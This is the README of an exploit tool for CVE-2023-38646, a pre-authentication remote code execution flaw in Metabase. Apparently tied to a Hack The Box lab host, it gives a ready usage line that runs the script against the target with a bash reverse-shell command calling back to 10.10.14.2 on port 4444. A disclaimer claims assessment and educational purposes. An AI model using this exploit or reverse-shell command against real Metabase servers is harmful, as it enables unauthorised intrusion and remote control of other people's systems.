An exploit for CVE-2023-38646, a pre-auth RCE in Metabase open-source edition < 0.46.6.1 and Metabase enterprise edition < 1.46.6.1.
You can use the exploit as follows:
python3 ./cve_2023-38646.py -t http://data.analytical.htb -c '/bin/bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'This is a tool for assessing your companies exposure to CVE-2023-38646, I am not response for any illegal or irresponsible usage of this code. For educational purposes only!